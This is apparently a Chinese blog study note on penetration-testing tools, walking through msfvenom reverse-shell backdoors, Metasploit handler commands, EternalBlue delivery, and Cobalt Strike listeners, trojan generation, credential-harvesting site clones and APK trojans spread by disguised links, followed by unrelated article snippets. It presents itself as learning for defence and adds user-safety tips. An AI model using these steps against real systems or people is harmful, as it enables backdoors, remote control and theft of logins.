技术标签: 网络安全
我是dream,我在新课程培训学习网安方面的知识,下面是关于msf恶意程序利用以及CS的内容。
目录
后门的生成是为了更好的理解渗透过程中的方法以及途径,进而达到更好的防护,而不是利用技巧去做攻击等不合理的行为
思路就是利用社会工程学中人的心理,去为某系软件利用msf生成一些后门程序,进而通过带有后门的软件实现渗透获取shell
msfvenom是一个Metasploit独立的有效负载生成器,也是msfpayload和msfencode的替代品。是用来生成后门的软件
1、制作Windows恶意软件获取shell;
2、msfvenom的shell在Windows中的使用;
3、msfvenom生成shell.exe
-p 后面的 Windows/meterpreter/reverse_tcp 是在指定生成的有效载荷的类型。
LHOST后面的ip是攻击机的ip (注意攻击机和靶机的ip要在同一个网段上)
LPORT=6060 这里是指定连接的端口,尽量选择大一点的端口
-f 指输出的形式,这里指生成exe这种可执行文件
msf > use expliot/multi/handler 加载模块
msf exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp 设置payload
msf expoit(multi/handler) > set lhost kali的ip 设置kali的ip
msf exploit(multi/handler) > exploit 或 run -j 运行
可通过永恒之蓝的漏洞上传
详情请看我的第二篇学习笔记——渗透测试
成功渗透之后,先用screenshot确定存储的路径
至于c:\\用两个,是因为这是转译(系统不同),对方收到后会丢失一个
然后用upload 加上刚才的路径,再加上刚才生成的exe文件,将这个文件传输到靶机的c盘里面。
ps:第一次上传失败是因为我没有在upload后面空格
第二次失败是我的上传路径不对。所以先用screenshot确定路径很必要。
一款以美国redteam团队研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具
它是一款基于Java的渗透测试神器,常被业界人士称为CS,也被戏称为“线上多人运动平台”。
CS为啥被称为“线上多人运动平台”?
CS使用了C/S架构,它分为客户端和服务端,服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell
C/S架构,服务器-客户机,即Client-Server(C/S)结构。C/S结构通常采取两层结构、服务器负责数据的管理,客户机负责完成与用户的交互任务。
当然连接别人的shell的前提,是知晓了对方的IP和密码。
Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、Java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
也可以在物理机上关闭防火墙和杀软,解压好了后复制粘贴到kali中。
cd cobalt_strike_4.5 首先进入CS的目录
ls 查看文件
chmod 777 * 使用chmod命令给所有的文件可读可写可执行权限(777表示可读可写可执行)
./teamserver kali的ip 连接密码
直接关闭防火墙,运行 cobaltstrike.bat这个文件
或者 在CS的目录下输入 ./cobaltstrike
在弹出来的窗口中,别名、主机、端口、用户都可以不修改,密码必须是第三部设置的密码,输入密码之后,点击连接.
会弹出一个“yes”“no”的弹窗,选择“yes”
就会出现下面这个弹窗
New Connection | 新建连接: | 支持连接多个服务器 |
Preferences | 偏好设置: | Cobalt Strike界面、控制台、以及输出报告样式、TeamServer连接记录 |
Visualization | 可视化: | 主要展示输出结果的视图 |
VPN Interfaces | VPN网卡: | 设置VPN |
Listenrs | 监听器: | 创建监听器(很重要) |
Script Manager | 脚本管理器: | 管理拓展的脚本 |
Close | 断开连接 | 字面意思 |
Applications (应用程序) | 显示受害主机的应用信息 | |
Credentials (密码凭证) | 显示所有已获取的受害主机的凭证,如hashdump、Mimikatz | |
Downloads (下载列表) | 查看已下载文件 | |
Event Log (事件日志) | 主机上线记录以及团队协作聊天记录 | |
Keystroke (键盘记录) | 查看键盘记录结果 | |
Proxy Pivots (代理转发) | 查看代理模块 | |
Screenshots (屏幕截图) | 查看所有屏幕截图 | |
Script Console(脚本控制台) | 加载第三方脚本以增强功能 | |
Targets (目标列表) | 显示所有受害主机 | |
Web Log (Web 日志) | 所有web服务的日志 |
HTML Application(HTA文档) | 生成一个恶意HTML Application木马,后缀格式为.hta。通过HTML调用其他语言的应用组件进行攻击,提供了可执行文件、PowerShell、VBA三种方法 |
MS Office Macro(Office宏) | 生成office宏病毒文件; |
Payload Generator(Payload生成器) | 生成各种语言版本的payload,可以生成基于C、C#、COM Scriptlet、Java、Perl、PowerShell、Python、VBA等的payload |
Windows Executable(Windows可执行程序) | 生成32位或64位的exe和基于服务的exe、DLL等后门程序 |
Windows Executable(S)(Windows可执行程序) | 用于生成一个exe可执行文件,其中包含Beacon的完成payload,不需要阶段性的请求。与Windows Executable模块相比,该模块额外提供了代理设置,以便在较为苛刻的环境中进行渗透测试。该模块还支持powershell脚本,可用于将Stageless Payload注入内存 |
Web Drive-byManage(站点管理) | 对开启的web服务进行管理 |
Clone Site(网站克隆) | 克隆网站,可以记录受害者提交的数据 |
Host File (文件托管) | 提供文件下载,可以选择Mime类型 |
Scripted Web Delivery (Web投递) | 为payload提供web服务以便下载和执行,类似于Metasploit的web_delivery |
Signed Applet Attack (签名Applet攻击) | 启动一个web服务以提供自签名Java Applet的运行环境 |
Smart Applet Attack (智能Applet攻击) | 自动检测Java版本并利用已知的exploit绕过security |
System Profiler (信息收集) | 用于获取系统信息,如系统版本,Flash版本,浏览器版本等 |
HTTP地址要填kali的ip地址,名字可以随便取,其他的可以保持不变。
点击保存后,就会显示“监听器已启动”。
克隆URL:选择要克隆的网址(一定要是http的网站,https不行)
下面的框框要勾选,做一个键盘监听,然后点击克隆。弹出窗口,复制克隆好的网址,再点ok。
然后就会出现一个跟被克隆的网站一样的页面,但是填入账号密码是不能登录的。
但是打开视图-web日志,会看到登录的信息。所以千万不要随意点开陌生链接,不要填写账号密码,不然账号和密码会被别人知道的。
这个操作真的太刑了。。。
选择刚才创建的监听器,再点击生成,就会出现右图,选择保存路径。
如果放到Windows,木马不见了,说明被防火墙杀掉了,记得添加信任区。
将生成的木马文件拖到靶机中,双击木马,CS就会显示上线!
此处可用永恒之蓝将木马上传到靶机中。
只要靶机运行这个文件,那么在CS视图-web日志中,就会显示出对方上线的信息。
右键,选择会话交互(相当于通过永恒之蓝渗透进入了,只不过速度会慢一点);或者回连间隔;抓取明文密码(没成功)等操作
可狱可囚,三思后行。
手机恶意应用程序:指在用户不完全知情和认可(它包括未经用户许可、强迫引导用户许可或隐瞒关键信息等)的情况下强行安装到用户手机中,或者一旦安装就无法正常卸载和删除,但又具备一定正常功能的软件程序。
它是介于病毒和正常软件之间的软件,它与病毒的区别是:一般还具备一定的正常功能。
根源载体——手机
恶意植入的木马程序可摘用户不知情的情况下,收集用户个人隐私信息、恶意扣费
PS:
1. 不要连接公共WiFi,因为连接好了之后,你和黑客处于同一个网段,黑客就可以攻击你的手机。
2. 去官网下载软件,不然可能下载到捆绑恶意应用程序(就像之前克隆的网站一样,肉眼分辨不出来)。
3. 不要贪小便宜,扫街边的二维码
很多APP由于存在大量安全漏洞和缺乏安全措施,被不法分子二次打包后,或被直接仿冒,或植入广告、恶意代码,甚至加入违法内容,重新投放应用市场,严重危害用户隐私与财产安全,网络“黑产”链条也开始滋生。
apk木马
名字可以随意取
1. 访问链接下载恶意应用(用短连接伪装,看不出来是木马)
2. 扫描二维码下载恶意应用
文章浏览阅读1k次。通过使用ajax方法跨域请求是浏览器所不允许的,浏览器出于安全考虑是禁止的。警告信息如下:不过jQuery对跨域问题也有解决方案,使用jsonp的方式解决,方法如下:$.ajax({ async:false, url: 'http://www.mysite.com/demo.do', // 跨域URL ty..._nginx不停的xhr
文章浏览阅读2k次。关于在 Oracle 中配置 extproc 以访问 ST_Geometry,也就是我们所说的 使用空间SQL 的方法,官方文档链接如下。http://desktop.arcgis.com/zh-cn/arcmap/latest/manage-data/gdbs-in-oracle/configure-oracle-extproc.htm其实简单总结一下,主要就分为以下几个步骤。..._extproc
文章浏览阅读1.5w次。linux下没有上面的两个函数,需要使用函数 mbstowcs和wcstombsmbstowcs将多字节编码转换为宽字节编码wcstombs将宽字节编码转换为多字节编码这两个函数,转换过程中受到系统编码类型的影响,需要通过设置来设定转换前和转换后的编码类型。通过函数setlocale进行系统编码的设置。linux下输入命名locale -a查看系统支持的编码_linux c++ gbk->utf8
文章浏览阅读750次。今天准备从生产库向测试库进行数据导入,结果在imp导入的时候遇到“ IMP-00009:导出文件异常结束” 错误,google一下,发现可能有如下原因导致imp的数据太大,没有写buffer和commit两个数据库字符集不同从低版本exp的dmp文件,向高版本imp导出的dmp文件出错传输dmp文件时,文件损坏解决办法:imp时指定..._imp-00009导出文件异常结束
文章浏览阅读143次。当下是一个大数据的时代,各个行业都离不开数据的支持。因此,网络爬虫就应运而生。网络爬虫当下最为火热的是Python,Python开发爬虫相对简单,而且功能库相当完善,力压众多开发语言。本次教程我们爬取前程无忧的招聘信息来分析Python程序员需要掌握那些编程技术。首先在谷歌浏览器打开前程无忧的首页,按F12打开浏览器的开发者工具。浏览器开发者工具是用于捕捉网站的请求信息,通过分析请求信息可以了解请..._初级python程序员能力要求
文章浏览阅读7.6k次,点赞2次,收藏6次。@Service标注的bean,类名:ABDemoService查看源码后发现,原来是经过一个特殊处理:当类的名字是以两个或以上的大写字母开头的话,bean的名字会与类名保持一致public class AnnotationBeanNameGenerator implements BeanNameGenerator { private static final String C..._@service beanname
文章浏览阅读6.9w次,点赞73次,收藏463次。1.前序创建#include<stdio.h>#include<string.h>#include<stdlib.h>#include<malloc.h>#include<iostream>#include<stack>#include<queue>using namespace std;typed_二叉树的建立
文章浏览阅读7.1k次。在Asp.net上使用Excel导出功能,如果文件名出现中文,便会以乱码视之。 解决方法: fileName = HttpUtility.UrlEncode(fileName, System.Text.Encoding.UTF8);_asp.net utf8 导出中文字符乱码
文章浏览阅读2.1k次,点赞4次,收藏23次。第一次实验 词法分析实验报告设计思想词法分析的主要任务是根据文法的词汇表以及对应约定的编码进行一定的识别,找出文件中所有的合法的单词,并给出一定的信息作为最后的结果,用于后续语法分析程序的使用;本实验针对 PL/0 语言 的文法、词汇表编写一个词法分析程序,对于每个单词根据词汇表输出: (单词种类, 单词的值) 二元对。词汇表:种别编码单词符号助记符0beginb..._对pl/0作以下修改扩充。增加单词
文章浏览阅读773次。我在使用adb.exe时遇到了麻烦.我想使用与bash相同的adb.exe shell提示符,所以我决定更改默认的bash二进制文件(当然二进制文件是交叉编译的,一切都很完美)更改bash二进制文件遵循以下顺序> adb remount> adb push bash / system / bin /> adb shell> cd / system / bin> chm..._adb shell mv 权限
文章浏览阅读6.8k次,点赞12次,收藏125次。1. 单目相机标定引言相机标定已经研究多年,标定的算法可以分为基于摄影测量的标定和自标定。其中,应用最为广泛的还是张正友标定法。这是一种简单灵活、高鲁棒性、低成本的相机标定算法。仅需要一台相机和一块平面标定板构建相机标定系统,在标定过程中,相机拍摄多个角度下(至少两个角度,推荐10~20个角度)的标定板图像(相机和标定板都可以移动),即可对相机的内外参数进行标定。下面介绍张氏标定法(以下也这么称呼)的原理。原理相机模型和单应矩阵相机标定,就是对相机的内外参数进行计算的过程,从而得到物体到图像的投影_相机-投影仪标定
文章浏览阅读2.2k次。文章目录Wayland 架构Wayland 渲染Wayland的 硬件支持简 述: 翻译一篇关于和 wayland 有关的技术文章, 其英文标题为Wayland Architecture .Wayland 架构若是想要更好的理解 Wayland 架构及其与 X (X11 or X Window System) 结构;一种很好的方法是将事件从输入设备就开始跟踪, 查看期间所有的屏幕上出现的变化。这就是我们现在对 X 的理解。 内核是从一个输入设备中获取一个事件,并通过 evdev 输入_wayland